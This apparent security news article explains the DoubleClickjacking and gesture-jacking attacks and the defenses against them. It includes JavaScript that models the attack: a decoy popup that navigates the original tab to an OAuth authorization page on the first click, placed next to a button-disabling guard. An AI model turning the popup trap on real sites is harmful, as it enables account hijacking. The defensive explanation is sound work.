DoubleClickjacking Exploit
Security researcher Paulos Yibelo has disclosed a new class of timing-based attack that exploits a double-click sequence to enable clickjacking and unauthorized account access on many major websites. The technique, dubbed DoubleClickjacking, is a novel form of UI manipulation that sidesteps the frame-based defenses sites rely on against classic clickjacking.
A New Approach to Clickjacking
Unlike traditional clickjacking, which overlays a hidden iframe of the target and captures a single click, DoubleClickjacking exploits the brief interval between the two clicks of a double-click. The shift sounds minor, but it removes the iframe from the picture entirely: the target page is loaded as a top-level navigation in a window the attacker controls, so the X-Frame-Options header never applies and the browser sends session cookies even under SameSite=Lax or SameSite=Strict, because the request is a first-party, top-level one.
Clickjacking, also known as UI redressing, deceives users into interacting with elements they perceive as harmless, such as a button, in order to trigger an unintended action, including granting access to data or changing account settings. DoubleClickjacking refines this concept by exploiting the gap between two clicks, letting an attacker sidestep those frame-based controls and hijack accounts with a single double-click from the victim.
How the Attack Works
The technique unfolds in the following sequence:
- A user visits an attacker-controlled website that either opens a new browser window automatically or prompts the user to open one.
- The new window, which may be dressed up as a routine CAPTCHA verification, asks the user to double-click.
- On the first click (the mousedown event), the pop-up closes itself and, in the same instant, navigates the original attacker tab beneath it to a sensitive page on the target site, such as an OAuth authorization request.
- The second click of the double-click therefore lands in the original tab, on whatever button now sits under the pointer, so the user approves a critical permission request without ever seeing it.
Because conventional clickjacking defenses are built to stop a single forced click on a framed page, this sequence passes straight through them. X-Frame-Options, CSP frame-ancestors, and SameSite cookies all presume the target is embedded in an attacker's frame; here it is never framed at all, so none of them mitigate the attack.
Preventative Measures and Long-Term Solutions
To address the issue, website developers can implement a client-side protection that keeps essential action buttons disabled until the page itself observes a user-initiated mouse movement or keypress. The second click of the double-click arrives on the freshly loaded page with no such event preceding it, so it hits a disabled button. Some platforms, including Dropbox, already employ this kind of defense.
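The following is an added example, not code from the DoubleClickjacking write-up or from any of the sites it names. It models the attack sequence listed under "How the Attack Works" (the pop-up trap that fires on the first mousedown) alongside the mouse-movement guard described in the paragraph above. The window and button objects are injected rather than taken from globals, so the same functions run in a browser (pass the real window and document elements) or under Node, where the EventTarget fakes at the bottom replay the flow. All URLs and the popup dimensions are hypothetical.

```javascript
// Added example: model of the DoubleClickjacking sequence and of the
// "disable until mousemove/keydown" guard. Not the researcher's PoC.

const TARGET_AUTHORIZE_URL =
  "https://target.example/oauth/authorize?client_id=attacker-app"; // hypothetical

// --- Attacker side -------------------------------------------------------

// Step 1: the attacker's original page opens the decoy "verify" window.
function openDecoyPopup(win, popupUrl) {
  return win.open(popupUrl, "_blank", "popup,width=400,height=300");
}

// Steps 3-4: script the decoy window runs. On the FIRST mousedown it
// navigates the opener (the attacker's original tab) to the sensitive page
// and closes itself, so the second click of the double-click lands in the
// opener on whatever button now sits under the pointer.
function installPopupTrap(popupWin, targetUrl) {
  popupWin.addEventListener("mousedown", () => {
    if (popupWin.opener) {
      popupWin.opener.location.href = targetUrl;
    }
    popupWin.close();
  }, { once: true });
}

// --- Defender side -------------------------------------------------------

// Guard for the sensitive page: critical buttons start disabled and are only
// enabled once this document sees a real pointer movement or keypress. The
// second click of a double-click reaches the newly loaded page without any
// mousemove/keydown before it, so it hits a disabled button.
function guardSensitiveButtons(win, buttons) {
  for (const b of buttons) b.disabled = true;
  const arm = () => {
    for (const b of buttons) b.disabled = false;
  };
  win.addEventListener("mousemove", arm, { once: true });
  win.addEventListener("keydown", arm, { once: true });
}

// Authorize-button handler; returns true when the sensitive action ran.
// A real browser never dispatches click on a disabled button; the check is
// made explicit here so the model can report what happened.
function handleAuthorizeClick(button, onAuthorize) {
  if (button.disabled) return false;
  onAuthorize();
  return true;
}

// --- Minimal fakes so the flow can be exercised outside a browser --------
// (constructed for this example; in a page, use the real window object)
class FakeWindow extends EventTarget {
  constructor(opener = null) {
    super();
    this.opener = opener;
    this.location = { href: "about:blank" };
    this.closed = false;
  }
  close() { this.closed = true; }
}

// Replays the attack with or without the guard and reports the outcome.
function simulate({ guarded }) {
  const attackerTab = new FakeWindow();
  attackerTab.location.href = "https://attacker.example/"; // hypothetical
  const popup = new FakeWindow(attackerTab);
  installPopupTrap(popup, TARGET_AUTHORIZE_URL);

  // First click: mousedown arrives in the popup.
  popup.dispatchEvent(new Event("mousedown"));

  // The attacker tab is now at the authorize page; model that page's script
  // running in the same window, with its authorize button under the pointer.
  const authorizeButton = { disabled: false };
  let authorized = false;
  if (guarded) guardSensitiveButtons(attackerTab, [authorizeButton]);

  // Second click: no mousemove or keydown has reached the new document.
  const clickAccepted = handleAuthorizeClick(authorizeButton, () => { authorized = true; });

  return { popupClosed: popup.closed, navigatedTo: attackerTab.location.href, authorized, clickAccepted };
}

// A legitimate user moves the pointer before clicking, which releases the guard.
function legitimateUse() {
  const win = new FakeWindow();
  const button = { disabled: false };
  guardSensitiveButtons(win, [button]);
  win.dispatchEvent(new Event("mousemove"));
  let authorized = false;
  handleAuthorizeClick(button, () => { authorized = true; });
  return authorized;
}
```

In the unguarded run the popup is closed, the attacker tab ends up at the authorize URL, and the click is accepted; with the guard installed the navigation still happens but the click is refused. Two points to keep in mind when deploying the guard on a real page: the listener must be registered early (inline in the document head, not after a large bundle loads), and because mousemove fires on any pointer motion, a twitch of the mouse between the two clicks could release it, so sites commonly pair it with a short minimum delay after load before buttons are enabled.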
As a long-term solution, the researcher recommends that browser vendors define a new standard, in the spirit of X-Frame-Options, that lets a site opt out of being the target of a double-click-based navigation.
A New Twist on Clickjacking
DoubleClickjacking is an evolution of well-documented clickjacking techniques, exploiting subtle timing gaps between user actions to swap legitimate UI elements with deceptive ones in an instant.
The disclosure follows an earlier one on cross-window forgery (also called gesture-jacking), another clickjacking variant. That technique persuades users to press and hold a key such as Enter or Space on an attacker-controlled site while it navigates to a target page, so the key press is delivered to a focused button on the target and triggers an unintended action.
On platforms such as Coinbase and Yahoo!, attackers could leverage gesture-jacking to hijack accounts. If a logged-in user visits a malicious website and holds Enter or Space, they could unknowingly authorize a rogue OAuth application. This works because both platforms let OAuth applications request broad access and assign predictable, static element IDs to their authorization buttons, so an attacker can pre-focus the button through a URL fragment and have the held key activate it.
As clickjacking methods continue to evolve, security teams must adopt proactive defenses to safeguard user interactions from increasingly sophisticated threats.